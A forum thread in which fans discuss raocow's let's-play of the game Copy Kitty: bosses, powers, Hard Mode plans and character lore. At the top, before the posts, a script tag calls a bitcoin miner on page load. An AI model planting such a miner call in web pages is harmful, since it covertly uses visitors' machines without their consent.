<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralpge project

Copy Kitty - Imitation is the besterest form of flattery

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
BobisOnlyBob
Mythical Quadruped

Re: Copy Kitty - Imitation is the besterest form of flattery

Postby BobisOnlyBob » 2 months ago

It still has a lot of natural chaos, but the Star runs are the opposite, control and management. I notice raocow is using a surprising amount of caution in the first runs right now, though - trying to get those first-run stars maybe?
BOB is an acronym for BOB is Only BOB etc.

kitikami

Postby kitikami » 2 months ago

"Tornado: pretty hard to use on its own, but boy howdy, combine it with almost anything and it's like the best thing in the universe." This is pretty much my exact thoughts on tornado as well.

One of the nice things about this game is you can still casually rain destruction on everything with Boki's combine powers, but it still feels much more deliberately designed than it used to with these extra challenges or modes that make you play more carefully. And actually now that I think about it, damage might be the best of the former cookie challenges to keep since it offers a large contrast in play style while still keeping the concept and understanding of what you have to do really simple. It's just really intuitive to switch from casual destruction to careful planning when the goal is no/low damage.

Kleetus

Postby Kleetus » 2 months ago

I know I am SUPER late to the party saying this. The old copy kitty LP was what introduced me to this game, so it's cool seeing raocow play the final version. Even if I'm not watching the LP regularly, I'm keeping tabs on it to see (hear?) raocow's reactions to the outrageous boss fights and powers.

raocow calls the exploding shuriken ability "violent" and "doesn't feel good" which I feel will cause flashbacks if/when he LPs

Kirby 64

With Copy Kitty on B side and ATMM on C side, raocow's playing two games that involve stealing powers from robots, funny how that works out.

BobisOnlyBob
Mythical Quadruped

Yoggval day! :pal:

I love how Yoggval is a recurring midboss and thematically ties every location together. I also love raocow's nickname for him, "The Hunter"! Wonder where he got that from?

I'm mostly just here to show some love for the spiky ghosty ball.

Voltgloss
Congratulations.
Pronouns: he/him/his

Postby Voltgloss » 2 months ago

So I just completed a certain late-game boss and I'm sitting here, slack-jawed, literally amazed at what I experienced.

I'm not going to risk revealing its name (even in spoilers) because MY GOD am I looking forward to raocow experiencing it blind as well.

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 2 months ago

I just beat the game, with both Boki and Savant. Still got Hard Mode to do. Got the damage requirements with both characters on all levels except the final one. That's going to be a thing, for both of them.

The Krijyl in today's video always does the same attacks in the same order, and it's not the only boss to follow a strict pattern like that. Something that can be useful to keep in mind.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Dark Hunter

Postby Dark Hunter » 2 months ago

Voltgloss wrote: So I just completed a certain late-game boss and I'm sitting here, slack-jawed, literally amazed at what I experienced.

I'm not going to risk revealing its name (even in spoilers) because MY GOD am I looking forward to raocow experiencing it blind as well.
I heard somewhere (not sure if true) that raocow does not plan on doing Hard Mode on this playthrough?

If so I am very sad. All the best stuff is in Hard Mode!

Like seriously, the normal mode bosses (well, except maybe two of them) do not even compare in their amazingness to what's in Hard.

SAJewers
hi

Postby SAJewers » 2 months ago

Dark Hunter wrote:
Voltgloss wrote: So I just completed a certain late-game boss and I'm sitting here, slack-jawed, literally amazed at what I experienced.

I heard somewhere (not sure if true) that raocow does not plan on doing Hard Mode on this playthrough?

If so I am very sad. All the best stuff is in Hard Mode!

Like seriously, the normal mode bosses (well, except maybe two of them) do not even compare in their amazingness to what's in Hard.
I believe his plan is to do Hard Mode at a later date. Not sure his plans with Savant, but I think that's also a later date as well.

At lest, from what I recall in the patapon spotzone, most of us agreed there he should split it up and not do it all at once, similar to how he stated he would return to RKF some time in the future to replay the game as the other character. I can't remember ow much of his advice he heeded.
ImageImageImageImage
ImageImageImageImage

Sebby19

Postby Sebby19 » 2 months ago

This arc regarding the factory (factory! factory!) is going longer than I thought. I wonder when this will end soon.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

Kitet

Postby Kitet » 2 months ago

I'm hype for the next world, it has some of my favorite music.

Also just wanna chime in - i'm not in the patreon discord, but as someone who's played through normal and hard mode of both boki and savant's campaigns, I think raocow taking on hard mode later is a good idea.
Doing the campaigns in either
Boki Normal > Savant Normal > Boki Hard > Savant Hard
or
Boki Normal > Boki Hard > Savant Normal > Savant Hard
order would be fine. I'm... not actually sure if the game will allow you to do boki's hard mode campaign before doing savant's normal mode, but if it does, it might be worth considering, since Savant's playstyle is a little more difficult than Boki's and it takes time to get used to it.
revamping while i get ready to post again

Plutia
Plutia too cute

Postby Plutia » 2 months ago

boki normal -> boki hard -> savant normal -> savant hard is how I'd like to see it done because raocow's gonna need to seriously adjust for savant content

FourteenthOrder
Pronouns: she/her

Postby FourteenthOrder » 2 months ago

Plutia wrote: boki normal -> boki hard -> savant normal -> savant hard is how I'd like to see it done because raocow's gonna need to seriously adjust for savant content
Agreed.

Sebby19

Man, where are the comments?

Anyways, this was an interesting take on a prison break arc. Though I find it weird that Boki opened that one door in that one level, and then it hasn't really come up since.
ImageImage
-Banned in Antarctica

Kleetus

Postby Kleetus » 2 months ago

I expected rao's first encounter with the Harvester Orzinav to be more troublesome; but this is because I completely blundered through Execution Chamber my first time playing.
Harvesters aren't as threatening when you realize that their attack is slow, telegraphed, and not a long range projectile, even if it does do silly high damage.

Dark Hunter

Sebby19 wrote: Though I find it weird that Boki opened that one door in that one level, and then it hasn't really come up since.
I think it's suggested that the alarm doors are not supposed to ever open on their own, at least until a Construct comes by to secure the prisoner and turn off the alarm.

The reason they open after Boki kills all the Constructs is because she's using those copied codes just like the first time, but she has to dispose of the Constructs first or they'll block the attempt.

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 2 months ago

so people who are in the know approx how much of this is left
i've honestly never played a video game in my life

freshtalk

Postby freshtalk » 2 months ago

Parama wrote: so people who are in the know approx how much of this is left
It'll go on forever. Accept the kitty.

BobisOnlyBob
Mythical Quadruped

We're coming up on the half way point of Boki Normal, and difficulty is increasing - we're on episode 17, so I would guess around 23-28 episodes more? Obviously can vary a lot. Boki Hard, Savant Normal and Savant Hard will all be separate at different times.

Basically last week of March for end of Boki Normal. I don't know if Boki Hard will immediately follow or if raocow will go back to the Patreon B-side list before that.

SAJewers
hi

main game has 12 worlds, and this is world 6. hard to say how many videos because it raocow might do more (or less) than 3 levels per video.

ImageImageImageImage
ImageImageImageImage

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 2 months ago

I remember a few versions ago when score requirements still existed and Treacherous Maze was one of the hardest levels to get a good score on.

Also, nice job jumping over the horizontal radio waves. I always dealt with that attack by jumping on the Yoggval itself.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Sebby19

Y'know, where are Boki's parents? Boki has been in that simulator for a couple hours now, they probably should have called him for supper by now.
Second, are they even aware his uncle is training their kid to be a child soldier?

I also wonder how much of this scenario is under Savant's control. He's basically the dungeon master for this entire adventure, right? I bring this up since I find it odd he would allow communication be essentially cutoff for the first half of the prison arc, unless he's going for a 'realistic immersion' angle. If that phrase makes any sense.
ImageImage
-Banned in Antarctica

Dark Hunter

Sebby19 wrote: Y'know, where are Boki's parents? Boki has been in that simulator for a couple hours now, they probably should have called him for supper by now.
Second, are they even aware his uncle is training their kid to be a child soldier?
1. Boki's a girl.

2. I think Raibys has said that Boki's actually a young adult and is old enough to be living on her own. (AzuRai, correct me if I'm mistaken here.)

Edit: Found Raibys's comment: "Boki's a young adult. I don't give ages for my characters but in human terms she'd probably be like 18 or 19. Savant wouldn't put Boki through such intense combat training if she were a kid, and Boki's not still in school or anything."

BobisOnlyBob
Mythical Quadruped

Yeah, Boki's a young adult, probably inbetween mandatory education and voluntary assuming it's anything like most earthbound civilization, but she's kinda childish. Also, she's adopted - her adoptive mother is a Ploctite (insect person with lots of limbs), same species as Savant, while Boki is a Kitera (crystal cave cat person).

SAJewers
hi

Note most of the answers to that are in the Encyclopedia (think the boxes in zero/zx/zxa)
ImageImageImageImage
ImageImageImageImage

kitikami

Postby kitikami » 2 months ago

On the star run for Total Lockdown, raocow passing up a tier-3 power that spreads destruction across the screen to stick with a more focused shot that could precision target without releasing chaos is a beautiful piece of character development in this series.

Return to “let's play”